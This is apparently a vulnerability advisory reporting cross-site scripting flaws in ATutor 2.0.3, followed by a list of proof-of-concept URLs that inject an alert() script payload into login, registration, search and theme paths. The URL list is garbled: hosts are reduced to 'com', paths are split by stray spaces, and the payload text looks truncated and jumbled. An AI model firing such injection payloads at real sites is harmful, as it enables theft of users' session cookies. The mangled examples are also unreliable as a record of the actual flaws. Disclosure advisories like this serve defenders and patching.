Source: https://com/bid/51423/info

ATutor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

ATutor 2.0.3 is vulnerable; other versions may also be affected.

php / " alert(okie)/index.php http : // com / ATutor / themes / default / social / basic_profile. css " alert(okie)/index.php http : // com / ATutor / about. php / jscripts / infusion / framework / fss / " alert(okie)/index.php http : // com / ATutor / registration. php / mods / _standard / flowplayer / " alert(okie)/index.php http : // com / ATutor / browse. php / jscripts / infusion / " alert(okie)/index.php http : // com / ATutor / login. php " alert(okie)/index.php http : // com / ATutor / login. php " alert(okie)/index.php http : // com / ATutor / password_reminder. php " alert(okie)/index.php http : // com / ATutor / search. php / " alert(okie) http : // com / ATutor / login. http : // com / ATutor / themes / default / tile_search / index.